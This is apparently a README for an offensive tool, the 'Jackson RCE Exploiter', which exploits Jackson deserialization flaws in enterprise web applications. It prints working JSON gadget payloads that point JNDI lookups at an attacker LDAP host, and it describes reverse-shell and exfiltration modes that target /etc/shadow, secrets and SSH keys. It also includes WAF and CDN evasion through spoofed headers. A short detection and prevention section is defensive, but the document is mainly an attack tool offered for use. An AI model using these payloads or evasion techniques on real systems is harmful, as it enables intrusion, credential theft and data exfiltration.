Share
## https://sploitus.com/exploit?id=210F1D78-C901-523F-976C-AF4C96C1CFDA
# ๐ฅ Jackson RCE Exploiter - Enterprise Bypass Edition




**Advanced Jackson Deserialization RCE Exploitation Framework with Enterprise Infrastructure Bypass**
[Features](#-features) โข [Installation](#-installation) โข [Usage](#-usage) โข [Attack Modes](#-attack-modes) โข [Examples](#-examples) โข [Disclaimer](#%EF%B8%8F-disclaimer)
---
## ๐ Overview
**Jackson RCE Exploiter** is a comprehensive penetration testing tool designed to identify and exploit Jackson deserialization vulnerabilities in enterprise environments. It features advanced bypass techniques for modern security infrastructure including CDNs, WAFs, load balancers, and monitoring systems.
### ๐ฏ Key Capabilities
- **Multi-Vector Exploitation**: JdbcRowSet, C3P0, Spring, and Xalan payloads
- **Enterprise Bypass**: Automatic detection and evasion of QRATOR CDN, F5 BIG-IP, CloudFlare
- **Infrastructure Fingerprinting**: Smart analysis of target technology stack
- **Advanced Exfiltration**: Base64+GZIP compression with automatic decoder generation
- **Comprehensive Reporting**: HTML, JSON, and TXT reports with full attack telemetry
- **Interactive Shell**: Reverse shell capability with automatic fallback mechanisms
---
## โจ Features
### ๐ก๏ธ **Infrastructure Analysis & Bypass**
- Automatic CDN detection (QRATOR, CloudFlare, Akamai)
- Load balancer identification (F5 BIG-IP)
- Framework fingerprinting (ASP.NET, Spring, etc.)
- CORS policy analysis and compliance
- Adaptive header generation based on infrastructure
- Header rotation for WAF evasion
### ๐ **Exploitation Capabilities**
| Attack Vector | Description | Bypass Level |
|--------------|-------------|--------------|
| **JdbcRowSet JNDI** | LDAP injection via JdbcRowSetImpl | โญโญโญโญโญ |
| **C3P0 JNDI** | Connection pool exploitation | โญโญโญโญ |
| **Spring Context** | ClassPathXmlApplicationContext | โญโญโญโญโญ |
| **Xalan Templates** | TemplatesImpl bytecode injection | โญโญโญโญ |
### ๐ **Attack Modes**
1. **Discovery Mode** ๐
- System information gathering
- Docker environment detection
- Network configuration enumeration
- Available tools identification
2. **Shell Mode** ๐
- Interactive reverse shell
- Multiple fallback mechanisms
- Persistent connection handling
3. **Data Extraction** ๐
- Sensitive file exfiltration (`/etc/passwd`, `/etc/shadow`)
- Environment variable extraction
- Configuration file discovery
- Secret scanning
4. **Advanced Base64 Exfiltration** ๐
- Stealth data exfiltration with compression
- Automatic Python decoder generation
- Multiple transport fallbacks (Python3 โ Python2 โ Perl)
- 10+ critical files extracted automatically
5. **Custom Command** ๐ฏ
- Execute arbitrary commands
- Full payload customization
### ๐ก **Unified Callback Server**
- Multi-protocol support (LDAP + HTTP + Shell)
- Automatic protocol detection
- Real-time callback logging
- Java bytecode serving for JNDI exploitation
- Base64+GZIP upload handler
### ๐ **Enterprise Reporting**
#### HTML Report Features:
- Interactive tabbed interface
- Infrastructure analysis visualization
- Color-coded success indicators
- Detailed request/response traces
- Callback timeline
- Executive summary dashboard
#### JSON Report Features:
- Machine-readable format
- Complete attack telemetry
- Infrastructure metadata
- Automated analysis integration
#### TXT Report Features:
- Plain text for documentation
- grep-friendly format
- Audit trail compliance
---
## ๐ Installation
### Prerequisites
```bash
# Python 3.7 or higher
python3 --version
# Required packages
pip3 install -r requirements.txt
```
### Quick Start
```bash
# Clone the repository
git clone https://github.com/yourusername/jackson-rce-exploiter.git
cd jackson-rce-exploiter
# Install dependencies
pip3 install requests urllib3
# Run the exploiter
python3 jackson_rce_exploiter.py
```
### Dependencies
```
requests>=2.25.0
urllib3>=1.26.0
```
---
## ๐ Usage
### Interactive Mode (Recommended)
```bash
python3 jackson_rce_exploiter.py
```
Follow the interactive prompts to configure:
1. Target URL and endpoint
2. Callback server IP and port
3. Attack mode selection
4. Bypass options (infrastructure analysis, header rotation)
5. Report configuration
### Example Session
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ๐ฅ JACKSON RCE EXPLOITER ENTERPRISE BYPASS v6.0 ๐ฅ โ
โ Advanced Infrastructure Evasion Edition โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Configuring Enterprise Bypass Attack
============================================================
[?] Target URL: https://vulnerable-app.example.com
[?] Vulnerable endpoint (default /api/endpoint): /api/data/process
[?] Public IP for callbacks: 203.0.113.50
[?] Server port (default 4444): 4444
[+] Port 4444 is available
[*] Attack Mode Selection
1. ๐ Discovery Mode - connectivity check + system information
2. ๐ Shell Mode - interactive shell access
3. ๐ Data Extraction - file and data extraction
4. ๐ Advanced Base64 Exfiltration - stealth exfiltration with decoder
5. ๐ฏ Custom Command - execute custom command
[?] Select mode (1-5): 4
[*] Protection Bypass Options
[?] Enable infrastructure analysis and automatic bypass? (Y/n): Y
[?] Enable header rotation for WAF bypass? (Y/n): Y
[*] Report Configuration
[?] Report filename (without extension): vulnerability_assessment_2024
[?] Select report format (1-4): 4
[*] Starting Enterprise Bypass Server on 0.0.0.0:4444...
[*] Performing infrastructure reconnaissance...
[+] Reconnaissance successful - analyzing infrastructure
๐ก๏ธ INFRASTRUCTURE ANALYSIS RESULTS:
============================================================
๐ก CDN: QRATOR
โ๏ธ Load Balancer: F5 BIG-IP
๐ฅ๏ธ Web Server: IIS
๐ง Framework: ASP.NET 4.0.30319
๐ก๏ธ Security Features: DDoS Protection, Enterprise Load Balancer
๐ Monitoring: AppDynamics APM
๐ฏ GENERATED BYPASS STRATEGIES:
1. QRATOR CDN evasion with legitimate headers
2. F5 BIG-IP session persistence
3. ASP.NET framework compliance
4. API version compliance v1.4
```
---
## ๐ฏ Attack Modes
### 1. Discovery Mode ๐
**Purpose**: Reconnaissance and environment profiling
**Extracted Information**:
- User context (whoami, id, groups)
- System information (uname -a, kernel version)
- Docker/container detection
- Network configuration
- Installed tools and utilities
- Process listing
**Use Case**: Initial assessment, environment mapping
```bash
Mode: Discovery
Commands: 4 reconnaissance payloads
Payloads: 16 (4 commands ร 4 vectors)
Stealth: Medium (base64+gzip encoded)
```
### 2. Shell Mode ๐
**Purpose**: Interactive command execution
**Capabilities**:
- Reverse shell connection
- Multi-method fallback (Python3 โ Bash)
- Persistent connection handling
- Real-time command output
**Use Case**: Interactive exploitation, manual testing
```bash
Mode: Shell
Connection: Reverse TCP
Protocols: Python socket, /dev/tcp
Ports: Configurable (default 4444)
```
### 3. Data Extraction ๐
**Purpose**: Automated sensitive file exfiltration
**Target Files**:
- `/etc/passwd` - User accounts
- `/etc/shadow` - Password hashes
- Environment variables (passwords, tokens, keys)
- Application configs (*.properties, *.conf, *.cfg)
- SSH keys and certificates
**Use Case**: Data exfiltration, privilege escalation research
```bash
Mode: Extraction
Files: 5 critical targets
Encoding: Base64+GZIP
Transport: HTTP POST
```
### 4. Advanced Base64 Exfiltration ๐
**Purpose**: Stealth data exfiltration with maximum coverage
**Features**:
- 10+ automated target files
- Base64+GZIP compression (reduces size by 70%)
- Automatic Python decoder script generation
- Transport fallback chain (Python3 โ Python2 โ Perl)
- WAF evasion through encoding
**Exfiltrated Data**:
```
โ System information (full_sysinfo.txt)
โ Password file (passwd_file.txt)
โ Shadow file (shadow_file.txt)
โ Environment secrets (environment_secrets.txt)
โ Configuration files (config_files_list.txt)
โ System version (system_version.txt)
โ Network connections (network_connections.txt)
โ Running processes (running_processes.txt)
โ User directories (user_directories.txt)
โ Scheduled tasks (scheduled_tasks.txt)
```
**Decoder Generation**:
```bash
# Automatically generated after successful exfiltration
python3 base64_exfil_decoder.py
# Output:
๐ Starting Advanced Exfiltration Decoder...
โ
Decoded: passwd_file.txt -> decoded_exfil/passwd_file.txt (2847 bytes)
โ
Decoded: shadow_file.txt -> decoded_exfil/shadow_file.txt (1523 bytes)
...
๐ฏ Decoding completed: 10/10 files successfully decoded
```
### 5. Custom Command ๐ฏ
**Purpose**: Execute arbitrary commands
**Example Commands**:
```bash
# Network scanning
"ip addr show && ss -tulpn"
# File search
"find / -name '*.key' -o -name '*.pem' 2>/dev/null"
# Memory dump
"cat /proc/self/environ"
# Database connection strings
"grep -r 'password' /etc /opt /var/www 2>/dev/null | head -20"
```
---
## ๐ก Examples
### Example 1: Quick Vulnerability Check
```bash
# Minimal setup for testing
python3 jackson_rce_exploiter.py
# Input:
Target URL: https://api.target.com
Endpoint: /api/v1/process
Callback IP: 192.168.1.100
Mode: 1 (Discovery)
Infrastructure Analysis: Y
Header Rotation: Y
```
### Example 2: Full Exploitation with Exfiltration
```bash
# Advanced attack with data extraction
python3 jackson_rce_exploiter.py
# Configuration:
Target: https://enterprise-app.example.com
Endpoint: /api/rest/v1.4.0/logs/runtime
Callback: YOUR_PUBLIC_IP:4444
Mode: 4 (Advanced Exfiltration)
Analysis: Enabled
Rotation: Enabled
Report: All formats
```
**Expected Output**:
```
[+] LDAP connection from 10.0.5.23:54321
[+] HTTP connection from 10.0.5.23:54322
[๐ BASE64+GZIP UPLOAD] from 10.0.5.23
โ
Base64+gzip file saved: exfiltrated_passwd_file.txt
โ
Base64+gzip file saved: exfiltrated_shadow_file.txt
...
๐ Advanced Exfiltration Decoder Generated:
โ base64_exfil_decoder.py - Python script to decode all intercepted data
Usage: python3 base64_exfil_decoder.py
Files ready for decoding: 10
```
### Example 3: Shell Access
```bash
# Interactive shell mode
python3 jackson_rce_exploiter.py
# Configuration:
Mode: 2 (Shell)
Server Port: 4444
# Monitor for shell connection:
[๐ REVERSE SHELL] from 10.0.5.23:54323
[!] Interactive shell established
[SHELL] bash: no job control in this shell
[SHELL] www-data@vulnerable-host:/var/www/html$
```
---
## ๐ Report Analysis
### HTML Report Structure
```
๐ vulnerability_assessment.html
โโโ ๐ Executive Summary
โ โโโ Total Requests
โ โโโ Success Rate
โ โโโ Callbacks Received
โโโ ๐ก๏ธ Infrastructure Analysis
โ โโโ Technology Stack
โ โโโ Security Features
โ โโโ API Information
โ โโโ CORS Policy
โโโ ๐ Payload Execution Details
โ โโโ Request Headers (with bypass strategies)
โ โโโ JSON Payloads
โ โโโ Response Analysis
โ โโโ Success Indicators
โโโ ๐ก Callbacks and Results
โโโ LDAP Connections
โโโ HTTP Callbacks
โโโ Shell Connections
โโโ Exfiltrated Data
```
### JSON Report Usage
```bash
# Parse JSON report programmatically
jq '.summary.successful_requests' vulnerability_assessment.json
# Extract all callback IPs
jq -r '.callbacks[].source_ip' vulnerability_assessment.json | sort -u
# Find successful payloads
jq '.requests[] | select(.response_status == 500) | .payload_name' vulnerability_assessment.json
```
---
## ๐ง Advanced Configuration
### Custom Payload Modification
Edit the `get_commands()` method in `EnterpriseJacksonExploiter` class:
```python
def get_commands(self, custom_command=""):
commands = {
'custom_mode': [
'your_custom_command_here',
'another_command',
]
}
return commands.get(self.mode, commands['discovery'])
```
### Infrastructure Analyzer Customization
Add custom bypass strategies in `InfrastructureAnalyzer.generate_bypass_strategy()`:
```python
if analysis.get('waf') == 'Imperva':
strategies.append({
'type': 'IMPERVA_BYPASS',
'description': 'Imperva WAF evasion',
'headers': {
'X-Forwarded-For': '127.0.0.1',
'X-Originating-IP': '127.0.0.1'
}
})
```
### Port and Timeout Configuration
```python
# In get_user_input() function
server_port = 8080 # Change default port
timeout = 60 # Increase timeout for slow networks
```
---
## ๐ก๏ธ Detection and Prevention
### How to Detect This Attack
**Network-based Detection**:
```
- Outbound LDAP connections (port 389, 636) from application servers
- Unusual outbound connections to high ports (4444, 8080)
- Base64-encoded HTTP POST requests with suspicious content
- Multiple failed deserialization attempts (HTTP 500 errors)
```
**Application-based Detection**:
```
- Jackson deserialization with @type field in JSON
- JNDI lookup attempts in logs
- JdbcRowSetImpl class instantiation
- Suspicious ClassPathXmlApplicationContext usage
```
### How to Prevent
**1. Update Jackson Library**:
```xml
com.fasterxml.jackson.core
jackson-databind
2.15.0
```
**2. Disable Default Typing**:
```java
ObjectMapper mapper = new ObjectMapper();
// DO NOT USE:
// mapper.enableDefaultTyping();
// Instead use:
mapper.activateDefaultTyping(
PolymorphicTypeValidator validator,
DefaultTyping applicability
);
```
**3. Input Validation**:
```java
// Reject JSON with @type field
if (jsonString.contains("@type")) {
throw new SecurityException("Polymorphic deserialization not allowed");
}
```
**4. Network Segmentation**:
```bash
# Block outbound LDAP from application servers
iptables -A OUTPUT -p tcp --dport 389 -j DROP
iptables -A OUTPUT -p tcp --dport 636 -j DROP
# Restrict outbound connections
iptables -P OUTPUT DROP
iptables -A OUTPUT -d trusted_destinations -j ACCEPT
```
**5. Disable JNDI**:
```bash
# Add JVM arguments
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
-Dcom.sun.jndi.rmi.object.trustURLCodebase=false
```
---
## ๐ฌ Technical Details
### Exploit Chain
```
1. Infrastructure Reconnaissance
โ
2. Bypass Strategy Generation
โ
3. Adaptive Header Crafting
โ
4. Jackson Payload Injection (@type)
โ
5. JNDI LDAP Lookup Triggered
โ
6. Callback Server Receives Request
โ
7. Malicious Java Class Served
โ
8. Remote Code Execution
โ
9. Callback with Results
โ
10. Data Exfiltration (Base64+GZIP)
```
### Payload Vectors
#### 1. JdbcRowSetImpl (JNDI LDAP)
```json
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://attacker.com:1389/Exploit",
"autoCommit": true
}
```
#### 2. C3P0 (JNDI)
```json
{
"@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource",
"jndiName": "ldap://attacker.com:1389/Exploit",
"loginTimeout": 0
}
```
#### 3. Spring ClassPathXmlApplicationContext
```json
{
"@type": "org.springframework.context.support.ClassPathXmlApplicationContext",
"configLocation": "ldap://attacker.com:1389/Exploit"
}
```
#### 4. Xalan TemplatesImpl
```json
[
"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
{
"transletBytecodes": [""],
"transletName": "exploit",
"outputProperties": {}
}
]
```
---
## ๐ References
### Jackson Deserialization Vulnerabilities
- [CVE-2017-7525](https://nvd.nist.gov/vuln/detail/CVE-2017-7525) - Jackson-databind RCE via defaultTyping
- [CVE-2017-15095](https://nvd.nist.gov/vuln/detail/CVE-2017-15095) - Jackson-databind Remote Code Execution
- [CVE-2019-12384](https://nvd.nist.gov/vuln/detail/CVE-2019-12384) - Jackson-databind Deserialization Gadgets
### Security Resources
- [FasterXML Jackson Security](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization)
- [OWASP Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)
- [PortSwigger: Insecure Deserialization](https://portswigger.net/web-security/deserialization)
### Research Papers
- "Java Unmarshaller Security" by Moritz Bechler
- "Jackson RCE: Exploiting DefaultTyping" - Security Research Blog
- "Enterprise Java Security Vulnerabilities" - BlackHat USA
---
## ๐ค Contributing
Contributions are welcome! Please feel free to submit a Pull Request.
### Development Setup
```bash
# Fork and clone the repository
git clone https://github.com/yourusername/jackson-rce-exploiter.git
cd jackson-rce-exploiter
# Create a feature branch
git checkout -b feature/your-feature-name
# Make your changes and test
python3 jackson_rce_exploiter.py
# Commit and push
git add .
git commit -m "Add: your feature description"
git push origin feature/your-feature-name
```
### Areas for Contribution
- ๐ New payload vectors
- ๐ก๏ธ Additional bypass techniques
- ๐ Enhanced reporting features
- ๐ Protocol support expansion
- ๐ Documentation improvements
- ๐ Bug fixes and optimizations
---
## ๐ Changelog
### Version 6.0 (Current)
- โจ Added enterprise infrastructure fingerprinting
- ๐ก๏ธ Implemented automatic bypass strategy generation
- ๐ Enhanced reporting with infrastructure analysis
- ๐ Added Advanced Base64 Exfiltration mode with decoder generation
- ๐ Improved multi-protocol callback server
- ๐จ Interactive CLI with color-coded output
- ๐ Added success rate calculation and telemetry
### Version 5.0
- ๐ Added Xalan TemplatesImpl payload vector
- ๐ก Unified LDAP + HTTP callback server
- ๐ Multi-transport fallback (Python3/Python2/Perl)
### Version 4.0
- ๐ฏ Custom command mode
- ๐ Automated data extraction
- ๐พ Base64+GZIP compression
---
## โ ๏ธ Disclaimer
**IMPORTANT**: This tool is provided for **educational and authorized security testing purposes only**.
### Legal Notice
- โ
**AUTHORIZED USE ONLY**: Only use this tool against systems you own or have explicit written permission to test
- โ **NO WARRANTY**: This software is provided "as is" without warranty of any kind
- โ๏ธ **YOUR RESPONSIBILITY**: Users are solely responsible for compliance with applicable laws
- ๐ซ **ILLEGAL USE PROHIBITED**: Unauthorized access to computer systems is illegal in most jurisdictions
### Ethical Guidelines
1. **Always obtain written authorization** before testing
2. **Respect scope limitations** defined in test agreements
3. **Report vulnerabilities responsibly** to system owners
4. **Do not access or exfiltrate** production data without explicit permission
5. **Follow coordinated disclosure** practices
### Use Cases
โ
**Legitimate Uses**:
- Authorized penetration testing
- Red team exercises with approval
- Security research in controlled environments
- Educational demonstrations with consent
- Vulnerability assessment for clients
โ **Prohibited Uses**:
- Unauthorized access to systems
- Data theft or espionage
- Malicious attacks
- Testing without permission
- Any illegal activity
**By using this tool, you agree to use it responsibly and legally.**
---
## ๐ Contact
- **Issues**: [GitHub Issues](https://github.com/yourusername/jackson-rce-exploiter/issues)
- **Security**: For responsible disclosure, contact: security@example.com
- **Discussions**: [GitHub Discussions](https://github.com/yourusername/jackson-rce-exploiter/discussions)
---
## ๐ License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
```
MIT License
Copyright (c) 2024 Security Research Team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
```
---
**โญ Star this repository if you find it useful!**
Made with โค๏ธ by Security Researchers | For Educational Purposes Only
[โฌ Back to Top](#-jackson-rce-exploiter---enterprise-bypass-edition)